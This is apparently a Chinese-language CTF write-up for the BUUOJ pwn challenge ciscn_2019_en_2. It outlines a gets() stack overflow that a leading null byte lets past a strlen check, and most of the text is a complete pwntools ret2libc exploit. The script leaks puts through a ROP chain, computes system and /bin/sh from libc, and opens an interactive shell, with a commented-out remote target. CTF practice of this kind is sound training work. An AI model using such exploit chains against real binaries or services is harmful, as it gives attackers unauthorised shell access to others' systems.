ciscn_2019_en_2
使用checksec
查看:
只开启了栈不可执行。
放进IDA中分析:
begin();
:输出一段文字,可以不用看。__isoc99_scanf("%d", &v4);
:获取用户输入的选项,2和3没用,直接看1选项。encrypt();
:1选项主要函数,跟进查看。
encrypt();
:
gets(s);
:存在栈溢出的可能性。if ( v0 >= strlen(s) )
:对用户输入的数据判断了长度。if ( s[x] <= 96 || s[x] > 122 )、if ( s[x] <= 64 || s[x] > 90 )、if ( s[x] > 47 && s[x] <= 57 )
:对用户输入的数据分别做对应的加密。
题目思路
gets(s);
存在栈溢出。- 用
\x00
绕过strlen(s)
,形成栈溢出。 - 泄露
puts()
地址,打常规ret2libc。
步骤解析
通过第一次的栈溢出泄露出
puts()
函数的地址
接着就能通过libc计算出
system()
和/bin/bash
的地址
完整exp
from pwn import *
#start
r = process("../buu/ciscn_2019_en_2")
# r = remote("node4.buuoj.cn",28559)
lib = ELF("../buu/ubuntu18(64).so")
elf = ELF("../buu/ciscn_2019_en_2")
#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83
main_addr = elf.symbols['main']
ret=0x4006b9
#attack
payload = b'\x00' + b'M'*(0x50+8-1) +p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.recv()
r.sendline(b"1")
r.recv()
r.sendline(payload)
r.recvline()
r.recvline()
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
print("puts_addr: " + hex(puts_addr))
# libc
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b'/bin/sh'))
print("system_addr: " + hex(system_addr))
print("bin_sh_addr" + hex(bin_sh_addr))
# obj = LibcSearcher("puts", puts_addr)
# base_addr = puts_addr >> 24
# base_addr = base_addr << 24
# system_addr = base_addr+ obj.dump("system") #system 偏移
# bin_sh_addr = base_addr+ obj.dump("str_bin_sh") #/bin/sh 偏移
#attack2
payload2 = b'\x00' + b'M'*(0x50+8-1) + p64(ret) +p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload2)
r.interactive()